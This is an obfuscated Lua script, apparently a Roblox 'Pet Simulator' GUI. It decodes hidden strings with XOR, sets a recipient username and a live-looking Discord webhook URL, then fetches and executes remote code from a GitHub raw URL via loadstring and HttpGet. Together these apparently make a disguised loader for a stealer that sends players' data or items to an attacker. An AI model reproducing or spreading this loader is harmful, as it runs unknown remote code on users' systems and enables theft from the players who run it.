--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.4) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for v11=1 + 0 , #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + (750 -(420 + 329)) )),v1(v2(v9,1 + (1505 -(80 + 1425)) + ((v11-((4 -2) -(1 -0)))% #v9) ,((3 -2) -(0 -0)) + ((v11-((2 -1) -(0 -0)))% #v9) + 1 )))%256 ));end return v5(v10);end Username=v7("\6\50\79\160\28\167\63\32\74\147\23\160\46\50\30\244","\92\75\43\193\114\194");WebHook="https://discord.com/api/webhooks/103827034152/GSnQ-DgU3PU6rY5y7ePOcYOi3bfDdCgjsiCib5yk07vBn8Y2HVknAR2INsTAEx8B-JNi";_G.CustomScriptName=v7("\227\183\110\244\43\249\187","\160\214\26\212\99\140\217\178");_G.Text1=v7("\217\255\223\95\254\188\223\92\170\240\217\78\238\245\216\72\164\178\152","\138\156\182\47");_G.Text2=v7("\118\10\24\237\95\252\86\73\29\229\92\168\73\6\11\224\74\236","\37\105\106\132\47\136");_G.Text3=v7("\204\157\51\58\203\246\135\53\104\254\241\157\59\11\215\250\136\38\104\253\230\153\51\59\204","\159\233\82\72\191");_G.Text4=v7("\101\122\232\206\253\76\113\253\211\158\102\109\236\198\205\87\52\244\198\205\4\118\249\194\208\4\103\232\198\204\80\113\248\134","\36\20\156\167\190");loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimguiss.lua"))();
